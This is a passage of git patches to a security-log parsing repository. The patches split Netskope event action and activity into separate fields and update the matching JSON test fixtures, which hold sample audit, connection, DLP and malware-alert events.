b/Netskope/netskope_events/ingest/parser.yml @@ -36,7 +36,8 @@ stages: "@timestamp": "{{parse_date.datetime}}" observer.vendor: "Netskope" event.dataset: "{{parsed_event.message.type}}" - event.action: "{{parsed_event.message.action or parsed_event.message.activity or 'Allow'}}" + event.action: "{{parsed_event.message.activity}}" + action.name: "{{parsed_event.message.action or 'Allow'}}" event.reason: "{{parsed_event.message.audit_log_event or parsed_event.message.bypass_reason}}" event.duration: "{{parsed_event.message.conn_duration}}" user_agent.original: "{{parsed_event.message.user_agent}}" From bbb2d8c5d99a2b154a4a8aeb127d12968cbc8b97 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Thu, 28 Nov 2024 09:46:49 +0100 Subject: [PATCH 099/150] Fixing tests --- .../tests/test_audit_log_deleted_inline_policy.json | 4 +++- .../tests/test_audit_log_edit_admin_record.json | 4 +++- .../netskope_events/tests/test_audit_log_login_failed.json | 4 +++- .../tests/test_audit_log_login_successful.json | 4 +++- .../tests/test_audit_log_logout_successful.json | 4 +++- .../tests/test_audit_log_password_change_successful.json | 4 +++- Netskope/netskope_events/tests/test_connection_log.json | 4 +++- Netskope/netskope_events/tests/test_dlp_incident.json | 3 +++ Netskope/netskope_events/tests/test_malware_alert.json | 5 ++++- Netskope/netskope_events/tests/test_nspolicy_block.json | 5 ++++- Netskope/netskope_events/tests/test_nspolicy_log.json | 3 +++ Netskope/netskope_events/tests/test_nspolicy_upload.json | 3 +++ Netskope/netskope_events/tests/test_user_alert.json | 5 ++++- 13 files changed, 42 insertions(+), 10 deletions(-) diff --git a/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json b/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json index df70ea26e..c564471d7 100644 --- a/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json +++ b/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json @@ -5,7 +5,6 @@ "expected": { "message": "{\n \"timestamp\": 1651451341,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 2,\n \"audit_log_event\": \"Deleted inline policy\",\n \"supporting_data\": {\n \"data_type\": \"policy\",\n \"data_values\": [\n false\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"acfa7348-64c5-40de-b28d-202c8362d0f7\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { - "action": "Allow", "category": [ "configuration" ], @@ -17,6 +16,9 @@ ] }, "@timestamp": "2022-05-02T00:29:01Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { diff --git a/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json b/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json index 10b406a5f..952e5c0b6 100644 --- a/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json +++ b/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json @@ -5,7 +5,6 @@ "expected": { "message": "{\n \"timestamp\": 1651489787,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 1,\n \"audit_log_event\": \"Edit admin record\",\n \"supporting_data\": {\n \"data_type\": \"admin\",\n \"data_values\": [\n \"admin@example.org\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"275a263c8f8d4b7d9e12bf65b9094116\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { - "action": "Allow", "category": [ "configuration" ], @@ -17,6 +16,9 @@ ] }, "@timestamp": "2022-05-02T11:09:47Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { diff --git a/Netskope/netskope_events/tests/test_audit_log_login_failed.json b/Netskope/netskope_events/tests/test_audit_log_login_failed.json index 8a792a408..05b0456e2 100644 --- a/Netskope/netskope_events/tests/test_audit_log_login_failed.json +++ b/Netskope/netskope_events/tests/test_audit_log_login_failed.json @@ -5,7 +5,6 @@ "expected": { "message": "{\n \"timestamp\": 1651494031,\n \"type\": \"admin_audit_logs\",\n \"user\": \"student13\",\n \"severity_level\": 1,\n \"audit_log_event\": \"Login Failed\",\n \"supporting_data\": {\n \"data_type\": \"user\",\n \"data_values\": [\n \"4.5.6.7\",\n \"student13\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"student13\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"60d81a80b26149b8a910dfffc48cbf41\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { - "action": "Allow", "category": [ "authentication" ], @@ -17,6 +16,9 @@ ] }, "@timestamp": "2022-05-02T12:20:31Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { diff --git a/Netskope/netskope_events/tests/test_audit_log_login_successful.json b/Netskope/netskope_events/tests/test_audit_log_login_successful.json index 01549d366..cf808efde 100644 --- a/Netskope/netskope_events/tests/test_audit_log_login_successful.json +++ b/Netskope/netskope_events/tests/test_audit_log_login_successful.json @@ -5,7 +5,6 @@ "expected": { "message": "{\n \"timestamp\": 1671727087,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 2,\n \"audit_log_event\": \"Login Successful\",\n \"supporting_data\": {\n \"data_type\": \"user\",\n \"data_values\": [\n \"1.2.3.4\",\n \"john.doe@example.org\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"45b78fd638944e9ca0c6d92dfe2d4815\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { - "action": "Allow", "category": [ "authentication" ], @@ -17,6 +16,9 @@ ] }, "@timestamp": "2022-12-22T16:38:07Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { diff --git a/Netskope/netskope_events/tests/test_audit_log_logout_successful.json b/Netskope/netskope_events/tests/test_audit_log_logout_successful.json index 12e39be95..fb06271d6 100644 --- a/Netskope/netskope_events/tests/test_audit_log_logout_successful.json +++ b/Netskope/netskope_events/tests/test_audit_log_logout_successful.json @@ -5,7 +5,6 @@ "expected": { "message": "{\n \"timestamp\": 1670409967,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 2,\n \"audit_log_event\": \"Logout Successful\",\n \"supporting_data\": {\n \"data_type\": \"reason\",\n \"data_values\": [\n \"Logged out due to inactivity\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"e0272abae25442f681d0dbbef65b67e9\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { - "action": "Allow", "category": [ "authentication" ], @@ -17,6 +16,9 @@ ] }, "@timestamp": "2022-12-07T10:46:07Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { diff --git a/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json b/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json index a2fa885de..667c5755e 100644 --- a/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json +++ b/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json @@ -5,7 +5,6 @@ "expected": { "message": "{\n \"timestamp\": 1651489787,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 1,\n \"audit_log_event\": \"Password Change Successful\",\n \"supporting_data\": {\n \"data_type\": \"user\",\n \"data_values\": [\n \"1.2.3.4\",\n \"admin@example.org\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"47e7e59a6ffa4662be63836a0f898b16\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { - "action": "Allow", "category": [ "iam" ], @@ -17,6 +16,9 @@ ] }, "@timestamp": "2022-05-02T11:09:47Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { diff --git a/Netskope/netskope_events/tests/test_connection_log.json b/Netskope/netskope_events/tests/test_connection_log.json index 5c5218356..996cd6263 100644 --- a/Netskope/netskope_events/tests/test_connection_log.json +++ b/Netskope/netskope_events/tests/test_connection_log.json @@ -5,7 +5,6 @@ "expected": { "message": "{\n \"_id\": \"69573873d4de0a4f1d2cbac4\",\n \"access_method\": \"Client\",\n \"app\": \"Swile\",\n \"appcategory\": \"HR\",\n \"bypass_reason\": \"SSL Do Not Decrypt Bypass Policy Matched\",\n \"bypass_traffic\": \"yes\",\n \"category\": \"HR\",\n \"cci\": 16,\n \"ccl\": \"poor\",\n \"connection_id\": 0,\n \"count\": 1,\n \"domain\": \"test.example.org\",\n \"dst_country\": \"FR\",\n \"dst_geoip_src\": 1,\n \"dst_latitude\": 48.85836410522461,\n \"dst_location\": \"Paris\",\n \"dst_longitude\": 2.294532060623169,\n \"dst_region\": \"Ile-de-France\",\n \"dst_timezone\": \"Europe/Paris\",\n \"dst_zipcode\": \"N/A\",\n \"dstip\": \"5.6.7.8\",\n \"dstport\": 443,\n \"netskope_pop\": \"FR-PAR1\",\n \"organization_unit\": \"\",\n \"other_categories\": [\n \"Finance/Accounting\",\n \"All Categories\",\n \"HR\"\n ],\n \"page\": \"test.example.org\",\n \"policy\": \"bypass_ssl for regulation purpose\",\n \"request_id\": 1111111111111111111,\n \"site\": \"Swile\",\n \"src_country\": \"FR\",\n \"src_geoip_src\": 2,\n \"src_latitude\": 48.11,\n \"src_location\": \"Rennes\",\n \"src_longitude\": -1.6744,\n \"src_region\": \"Brittany\",\n \"src_time\": \"Wed Dec 21 17:12:00 2022\",\n \"src_timezone\": \"Europe/Paris\",\n \"src_zipcode\": \"35000\",\n \"srcip\": \"4.5.6.7\",\n \"ssl_decrypt_policy\": \"yes\",\n \"timestamp\": 1671639140,\n \"traffic_type\": \"CloudApp\",\n \"transaction_id\": 0,\n \"type\": \"connection\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"url\": \"test.example.org\",\n \"user\": \"john.doe@example.org\",\n \"user_generated\": \"yes\",\n \"userip\": \"1.2.3.4\",\n \"userkey\": \"john.doe@example.org\",\n \"org\": \"\",\n \"http_transaction_count\": 0,\n \"network\": \"\",\n \"useragent\": \"\",\n \"dsthost\": \"\",\n \"numbytes\": 0,\n \"CononicalName\": \"\",\n \"os_version\": \"\",\n \"browser_session_id\": 0,\n \"resp_cnt\": 0,\n \"log_file_name\": \"\",\n \"suppression_end_time\": 0,\n \"browser_version\": \"\",\n \"severity\": \"\",\n \"client_bytes\": 0,\n \"suppression_start_time\": 0,\n \"app_session_id\": 0,\n \"sAMAccountName\": \"\",\n \"req_cnt\": 0,\n \"device\": \"\",\n \"browser\": \"\",\n \"userPrincipalName\": \"\",\n \"conn_endtime\": 1671639139,\n \"conn_duration\": 3,\n \"protocol\": \"\",\n \"fromlogs\": \"\",\n \"serial\": \"\",\n \"resp_content_len\": 0,\n \"dynamic_classification\": \"\",\n \"hostname\": \"\",\n \"os\": \"\",\n \"server_bytes\": 0,\n \"conn_starttime\": 1671639136,\n \"sessionid\": \"\",\n \"resp_content_type\": \"\"\n}\n", "event": { - "action": "Allow", "category": [ "network" ], @@ -20,6 +19,9 @@ ] }, "@timestamp": "2022-12-21T16:12:20Z", + "action": { + "name": "Allow" + }, "destination": { "address": "5.6.7.8", "bytes": 0, diff --git a/Netskope/netskope_events/tests/test_dlp_incident.json b/Netskope/netskope_events/tests/test_dlp_incident.json index 37ab6e32b..b3cb772d3 100644 --- a/Netskope/netskope_events/tests/test_dlp_incident.json +++ b/Netskope/netskope_events/tests/test_dlp_incident.json @@ -16,6 +16,9 @@ ] }, "@timestamp": "2023-01-31T08:11:53Z", + "action": { + "name": "Allow" + }, "cloud": { "instance": { "id": "example.org" diff --git a/Netskope/netskope_events/tests/test_malware_alert.json b/Netskope/netskope_events/tests/test_malware_alert.json index 5e5f6de15..e1a0a66c5 100644 --- a/Netskope/netskope_events/tests/test_malware_alert.json +++ b/Netskope/netskope_events/tests/test_malware_alert.json @@ -5,7 +5,7 @@ "expected": { "message": "{\n \"_id\": \"882049056ee9e069c1c329b7\",\n \"access_method\": \"Client\",\n \"action\": \"Detection\",\n \"activity\": \"Download\",\n \"alert\": \"yes\",\n \"alert_type\": \"Malware\",\n \"app\": \"eicar\",\n \"app_session_id\": 111111111111111111,\n \"appcategory\": \"n/a\",\n \"browser\": \"Safari\",\n \"category\": \"n/a\",\n \"cci\": \"\",\n \"ccl\": \"unknown\",\n \"connection_id\": 0,\n \"count\": 1,\n \"device\": \"Mac Device\",\n \"dst_country\": \"US\",\n \"dst_geoip_src\": 2,\n \"dst_latitude\": 47.6711,\n \"dst_location\": \"Redmond\",\n \"dst_longitude\": -122.1253,\n \"dst_region\": \"Washington\",\n \"dst_timezone\": \"America/Los_Angeles\",\n \"dst_zipcode\": \"98073\",\n \"dstip\": \"5.6.7.8\",\n \"file_path\": \"NA\",\n \"file_size\": 308,\n \"file_type\": \"File Type Not Detected\",\n \"hostname\": \"MacBook Pro\",\n \"instance\": null,\n \"managementID\": \"99999999999999999999999999999999\",\n \"md5\": \"68b329da9893e34099c7d8ad5cb9c940\",\n \"mime_type\": \"\",\n \"nsdeviceuid\": \"BC848089-186A-4F2D-A26F-E5CC94C29E56\",\n \"object\": \"eicarcom2.zip\",\n \"object_id\": \"68b329da9893e34099c7d8ad5cb9c940\",\n \"object_type\": \"File\",\n \"organization_unit\": \"\",\n \"os\": \"Monterey\",\n \"referer\": \"https://www.eicar.org/\",\n \"request_id\": 2222222222222222222,\n \"severity\": \"high\",\n \"site\": \"eicar\",\n \"src_country\": \"FR\",\n \"src_geoip_src\": 2,\n \"src_latitude\": 48.11,\n \"src_location\": \"Rennes\",\n \"src_longitude\": -1.6744,\n \"src_region\": \"Brittany\",\n \"src_timezone\": \"Europe/Paris\",\n \"src_zipcode\": \"35000\",\n \"srcip\": \"4.3.2.1\",\n \"timestamp\": 1671631928,\n \"title\": \"eicarcom2.zip\",\n \"traffic_type\": \"CloudApp\",\n \"transaction_id\": 3333333333333333333,\n \"tss_mode\": \"inline\",\n \"type\": \"nspolicy\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"url\": \"secure.eicar.org/eicarcom2.zip\",\n \"user\": \"john.doe@example.org\",\n \"user_id\": \"john.doe@example.org\",\n \"userip\": \"1.2.3.4\",\n \"userkey\": \"john.doe@example.org\",\n \"dlp_file\": \"\",\n \"data_center\": \"\",\n \"browser_version\": \"\",\n \"owner\": \"\",\n \"dlp_incident_id\": 0,\n \"channel_id\": \"\",\n \"from_user_category\": \"\",\n \"resp_cnt\": 0,\n \"suppression_key\": \"\",\n \"loginurl\": \"\",\n \"total_collaborator_count\": 0,\n \"os_version\": \"\",\n \"dlp_rule\": \"\",\n \"dlp_mail_parent_id\": \"\",\n \"instance_id\": \"\",\n \"to_user\": \"\",\n \"suppression_end_time\": 0,\n \"fromlogs\": \"\",\n \"dlp_parent_id\": 0,\n \"dstport\": 0,\n \"dst_timezone\": \"\",\n \"serial\": \"\",\n \"audit_category\": \"\",\n \"sha256\": \"\",\n \"from_user\": \"\",\n \"sAMAccountName\": \"\",\n \"app_activity\": \"\",\n \"useragent\": \"\",\n \"netskope_activity\": \"\",\n \"conn_duration\": 0,\n \"other_categories\": [],\n \"custom_connector\": \"\",\n \"dlp_rule_severity\": \"\",\n \"numbytes\": 0,\n \"telemetry_app\": \"\",\n \"true_obj_category\": \"\",\n \"userPrincipalName\": \"\",\n \"logintype\": \"\",\n \"suppression_start_time\": 0,\n \"browser_session_id\": 0,\n \"dlp_profile\": \"\",\n \"src_time\": \"\",\n \"modified\": 0,\n \"policy\": \"\",\n \"policy_id\": \"\",\n \"notify_template\": \"\",\n \"audit_type\": \"\",\n \"orignal_file_path\": \"\",\n \"dlp_is_unique_count\": \"\",\n \"org\": \"\",\n \"user_category\": \"\",\n \"dlp_unique_count\": 0,\n \"exposure\": \"\",\n \"netskope_pop\": \"\",\n \"shared_with\": \"\",\n \"client_bytes\": 0,\n \"sanctioned_instance\": \"\",\n \"device_classification\": \"\",\n \"data_type\": \"\",\n \"scan_type\": \"\",\n \"internal_collaborator_count\": 0,\n \"CononicalName\": \"\",\n \"workspace\": \"\",\n \"log_file_name\": \"\",\n \"parent_id\": \"\",\n \"true_obj_type\": \"\",\n \"dlp_rule_count\": 0,\n \"sessionid\": \"\",\n \"workspace_id\": \"\",\n \"page_site\": \"\",\n \"universal_connector\": \"\",\n \"server_bytes\": 0,\n \"req_cnt\": 0,\n \"file_lang\": \"\",\n \"protocol\": \"\",\n \"web_universal_connector\": \"\",\n \"dsthost\": \"\",\n \"appsuite\": \"\",\n \"managed_app\": \"\",\n \"page\": \"\"\n}\n", "event": { - "action": "Detection", + "action": "Download", "category": [ "malware" ], @@ -17,6 +17,9 @@ ] }, "@timestamp": "2022-12-21T14:12:08Z", + "action": { + "name": "Detection" + }, "destination": { "address": "5.6.7.8", "bytes": 0, diff --git a/Netskope/netskope_events/tests/test_nspolicy_block.json b/Netskope/netskope_events/tests/test_nspolicy_block.json index 0d739d4fd..404b5d4ab 100644 --- a/Netskope/netskope_events/tests/test_nspolicy_block.json +++ b/Netskope/netskope_events/tests/test_nspolicy_block.json @@ -11,7 +11,7 @@ "expected": { "message": "{\"_id\":\"55093de1d7b4571d8941f492\",\"access_method\":\"Client\",\"action\":\"block\",\"activity\":\"Browse\",\"alert\":\"yes\",\"app\":\"DNS Over HTTPS\",\"app_session_id\":1234567890,\"appcategory\":\"General\",\"browser\":\"Chrome\",\"browser_session_id\":2222222222222,\"category\":\"General\",\"cci\":\"\",\"ccl\":\"unknown\",\"connection_id\":0,\"count\":1,\"device\":\"Windows Device\",\"device_classification\":\"unmanaged\",\"dst_country\":\"US\",\"dst_latitude\":37.775699615478516,\"dst_location\":\"San Francisco\",\"dst_longitude\":-122.39520263671875,\"dst_region\":\"California\",\"dst_timezone\":\"America/Los_Angeles\",\"dst_zipcode\":\"N/A\",\"dstip\":\"1.2.3.4\",\"dstport\":443,\"hostname\":\"PC-HOST01\",\"ja3\":\"1234567890abcdef1234567890abcdef\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"netskope_pop\":\"FR-PAR2\",\"notify_template\":\"silent_block.html\",\"organization_unit\":\"\",\"os\":\"Windows 11\",\"os_version\":\"Windows NT 11.0\",\"other_categories\":[\"Technology\",\"General\"],\"page\":\"test.example.com\",\"page_site\":\"test\",\"policy\":\"Block DoH - incompatibility with Netskope\",\"policy_id\":\"99999999999999999999999999999999 2024-10-30 13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":444444444444444444,\"severity\":\"unknown\",\"site\":\"DOH\",\"src_country\":\"FR\",\"src_latitude\":48.8323,\"src_location\":\"Paris\",\"src_longitude\":2.4075,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:01:00 2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75018\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731574892,\"traffic_type\":\"CloudApp\",\"transaction_id\":111111111111,\"type\":\"nspolicy\",\"ur_normalized\":\"john.doe@mail.fr\",\"url\":\"test.example.com\",\"user\":\"john.doe@mail.fr\",\"useragent\":\"Chrome\",\"userip\":\"10.20.30.40\",\"userkey\":\"john.doe@mail.fr\",\"log_file_name\":\"\",\"from_user\":\"\",\"ext_labels\":[],\"audit_type\":\"\",\"CononicalName\":\"\",\"parent_id\":\"\",\"tss_scan_failed\":\"\",\"data_center\":\"\",\"from_user_category\":\"\",\"internal_collaborator_count\":0,\"dlp_rule_severity\":\"\",\"req_cnt\":0,\"dlp_parent_id\":0,\"alert_type\":\"\",\"workspace\":\"\",\"dst_geoip_src\":0,\"user_category\":\"\",\"channel_id\":\"\",\"loginurl\":\"\",\"dlp_is_unique_count\":\"\",\"netskope_activity\":\"\",\"retro_scan_name\":\"\",\"to_user\":\"\",\"sha256\":\"\",\"justification_type\":\"\",\"fromlogs\":\"\",\"title\":\"\",\"universal_connector\":\"\",\"custom_connector\":\"\",\"modified\":0,\"user_confidence_index\":0,\"exposure\":\"\",\"orignal_file_path\":\"\",\"instance_id\":\"\",\"managementID\":\"\",\"sanctioned_instance\":\"\",\"file_lang\":\"\",\"dlp_scan_failed\":\"\",\"mime_type\":\"\",\"browser_version\":\"\",\"object_id\":\"\",\"data_type\":\"\",\"audit_category\":\"\",\"dlp_mail_parent_id\":\"\",\"file_path\":\"\",\"sAMAccountName\":\"\",\"client_bytes\":0,\"dlp_file\":\"\",\"org\":\"\",\"numbytes\":0,\"tss_fail_reason\":\"\",\"object\":\"\",\"nsdeviceuid\":\"\",\"app_activity\":\"\",\"instance\":\"\",\"userPrincipalName\":\"\",\"object_type\":\"\",\"scan_type\":\"\",\"appsuite\":\"\",\"conn_duration\":0,\"file_type\":\"\",\"dsthost\":\"\",\"logintype\":\"\",\"true_obj_type\":\"\",\"dlp_rule\":\"\",\"serial\":\"\",\"suppression_key\":\"\",\"suppression_start_time\":0,\"dlp_rule_count\":0,\"shared_with\":\"\",\"resp_cnt\":0,\"justification_reason\":\"\",\"web_universal_connector\":\"\",\"server_bytes\":0,\"dlp_unique_count\":0,\"md5\":\"\",\"file_size\":0,\"smtp_to\":[],\"dlp_incident_id\":0,\"true_obj_category\":\"\",\"src_geoip_src\":0,\"total_collaborator_count\":0,\"sessionid\":\"\",\"user_id\":\"\",\"custom_attr\":{},\"referer\":\"\",\"suppression_end_time\":0,\"owner\":\"\",\"tss_mode\":\"\",\"dlp_fail_reason\":\"\",\"workspace_id\":\"\",\"dlp_profile\":\"\"}", "event": { - "action": "block", + "action": "Browse", "category": [ "network" ], @@ -23,6 +23,9 @@ ] }, "@timestamp": "2024-11-14T09:01:32Z", + "action": { + "name": "block" + }, "destination": { "address": "1.2.3.4", "bytes": 0, diff --git a/Netskope/netskope_events/tests/test_nspolicy_log.json b/Netskope/netskope_events/tests/test_nspolicy_log.json index d0d9ed304..412ece514 100644 --- a/Netskope/netskope_events/tests/test_nspolicy_log.json +++ b/Netskope/netskope_events/tests/test_nspolicy_log.json @@ -17,6 +17,9 @@ ] }, "@timestamp": "2022-12-21T15:52:00Z", + "action": { + "name": "Allow" + }, "cloud": { "instance": { "id": "Example" diff --git a/Netskope/netskope_events/tests/test_nspolicy_upload.json b/Netskope/netskope_events/tests/test_nspolicy_upload.json index b05f61a9d..314e7d7e1 100644 --- a/Netskope/netskope_events/tests/test_nspolicy_upload.json +++ b/Netskope/netskope_events/tests/test_nspolicy_upload.json @@ -23,6 +23,9 @@ ] }, "@timestamp": "2024-11-14T09:04:46Z", + "action": { + "name": "Allow" + }, "destination": { "address": "1.2.3.4", "bytes": 0, diff --git a/Netskope/netskope_events/tests/test_user_alert.json b/Netskope/netskope_events/tests/test_user_alert.json index 4c435b860..bb5831a9c 100644 --- a/Netskope/netskope_events/tests/test_user_alert.json +++ b/Netskope/netskope_events/tests/test_user_alert.json @@ -5,7 +5,7 @@ "expected": { "message": "{\n \"_id\": \"882049056ee9e069c1c329b7\",\n \"access_method\": \"Client\",\n \"action\": \"useralert\",\n \"activity\": \"Share\",\n \"alert\": \"yes\",\n \"app\": \"WeTransfer\",\n \"app_session_id\": 1111111111111111111,\n \"appcategory\": \"Cloud Storage\",\n \"browser\": \"Edge\",\n \"browser_session_id\": 2222222222222222222,\n \"browser_version\": \"108.0.1462.54\",\n \"category\": \"Cloud Storage\",\n \"cci\": 58,\n \"ccl\": \"low\",\n \"connection_id\": 3333333333333333333,\n \"count\": 1,\n \"device\": \"Windows Device\",\n \"device_classification\": \"unmanaged\",\n \"dst_country\": \"IE\",\n \"dst_geoip_src\": 2,\n \"dst_latitude\": 53.3379,\n \"dst_location\": \"Dublin\",\n \"dst_longitude\": -6.2591,\n \"dst_region\": \"Leinster\",\n \"dst_timezone\": \"Europe/Dublin\",\n \"dst_zipcode\": \"D02\",\n \"dstip\": \"108.128.91.183\",\n \"from_user\": \"jane.doe@example.org\",\n \"hostname\": \"TEST-1234\",\n \"managed_app\": \"no\",\n \"managementID\": \"99999999999999999999999999999999\",\n \"netskope_pop\": \"FR-PAR1\",\n \"notify_template\": \"useralert_justify.html\",\n \"nsdeviceuid\": \"BC848089-186A-4F2D-A26F-E5CC94C29E56\",\n \"object\": \"Client.exe\",\n \"object_type\": \"File\",\n \"organization_unit\": \"\",\n \"os\": \"Windows 11\",\n \"os_version\": \"Windows 11\",\n \"page\": \"wetransfer.com/\",\n \"page_site\": \"Web Background\",\n \"policy\": \"DO NOT CHANGE Educate Upload to Non-Corporate Storage\",\n \"policy_id\": \"99999999999999999999999999999999 2022-12-21 14:31:09.981853\",\n \"protocol\": \"HTTPS/2\",\n \"referer\": \"https://wetransfer.com/\",\n \"request_id\": 4444444444444444444,\n \"severity\": \"unknown\",\n \"site\": \"WeTransfer\",\n \"src_country\": \"FR\",\n \"src_geoip_src\": 2,\n \"src_latitude\": 48.11,\n \"src_location\": \"Rennes\",\n \"src_longitude\": -1.6744,\n \"src_region\": \"Brittany\",\n \"src_time\": \"Wed Dec 21 15:52:08 2022\",\n \"src_timezone\": \"Europe/Paris\",\n \"src_zipcode\": \"35000\",\n \"srcip\": \"4.3.2.1\",\n \"telemetry_app\": \"\",\n \"timestamp\": 1671634321,\n \"to_user\": \"a@a.fr\",\n \"traffic_type\": \"CloudApp\",\n \"transaction_id\": 4444444444444444444,\n \"type\": \"nspolicy\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"url\": \"wetransfer.com/api/v4/transfers/email\",\n \"user\": \"john.doe@example.org\",\n \"useragent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.54\",\n \"userip\": \"1.2.3.4\",\n \"userkey\": \"john.doe@example.org\",\n \"internal_collaborator_count\": 0,\n \"fromlogs\": \"\",\n \"dlp_incident_id\": 0,\n \"owner\": \"\",\n \"dlp_profile\": \"\",\n \"workspace\": \"\",\n \"user_id\": \"\",\n \"userPrincipalName\": \"\",\n \"true_obj_category\": \"\",\n \"dlp_is_unique_count\": \"\",\n \"orignal_file_path\": \"\",\n \"other_categories\": [],\n \"serial\": \"\",\n \"tss_mode\": \"\",\n \"conn_duration\": 0,\n \"from_user_category\": \"\",\n \"md5\": \"\",\n \"data_type\": \"\",\n \"title\": \"\",\n \"log_file_name\": \"\",\n \"dstport\": 0,\n \"exposure\": \"\",\n \"instance_id\": \"\",\n \"audit_category\": \"\",\n \"netskope_activity\": \"\",\n \"file_type\": \"\",\n \"total_collaborator_count\": 0,\n \"file_path\": \"\",\n \"modified\": 0,\n \"dlp_rule_count\": 0,\n \"suppression_end_time\": 0,\n \"CononicalName\": \"\",\n \"alert_type\": \"\",\n \"sanctioned_instance\": \"\",\n \"suppression_start_time\": 0,\n \"dlp_parent_id\": 0,\n \"true_obj_type\": \"\",\n \"dlp_mail_parent_id\": \"\",\n \"audit_type\": \"\",\n \"workspace_id\": \"\",\n \"dsthost\": \"\",\n \"web_universal_connector\": \"\",\n \"req_cnt\": 0,\n \"mime_type\": \"\",\n \"suppression_key\": \"\",\n \"scan_type\": \"\",\n \"shared_with\": \"\",\n \"client_bytes\": 0,\n \"object_id\": \"\",\n \"user_category\": \"\",\n \"dlp_rule\": \"\",\n \"parent_id\": \"\",\n \"sha256\": \"\",\n \"dlp_rule_severity\": \"\",\n \"logintype\": \"\",\n \"org\": \"\",\n \"dlp_unique_count\": 0,\n \"file_size\": 0,\n \"instance\": \"\",\n \"sAMAccountName\": \"\",\n \"resp_cnt\": 0,\n \"universal_connector\": \"\",\n \"numbytes\": 0,\n \"server_bytes\": 0,\n \"channel_id\": \"\",\n \"file_lang\": \"\",\n \"app_activity\": \"\",\n \"appsuite\": \"\",\n \"sessionid\": \"\",\n \"loginurl\": \"\",\n \"dlp_file\": \"\",\n \"data_center\": \"\",\n \"custom_connector\": \"\"\n}\n", "event": { - "action": "useralert", + "action": "Share", "category": [ "network" ], @@ -17,6 +17,9 @@ ] }, "@timestamp": "2022-12-21T14:52:01Z", + "action": { + "name": "useralert" + }, "destination": { "address": "108.128.91.183", "bytes": 0, From 9264ef70512e299c783d05b43afb38dacd4c3431 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?L=C3=A9na=C3=AFg?= <126670263+LenaigKaliou@users.noreply.github.com> Date: Thu, 28 Nov 2024 10:25:08 +0100 Subject: [PATCH 100/150] Update Microsoft/microsoft-365-defender/ingest/parser.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Sébastien Quioc --- Microsoft/microsoft-365-defender/ingest/parser.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml index fc32171cd..d212bdb11 100644 --- a/Microsoft/microsoft-365-defender/ingest/parser.yml +++ b/Microsoft/microsoft-365-defender/ingest/parser.yml @@ -267,7 +267,8 @@ stages: action.properties.InitiatingProcessFileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}" action.properties.InitiatingProcessIntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}" action.properties.InitiatingProcessLogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}" - 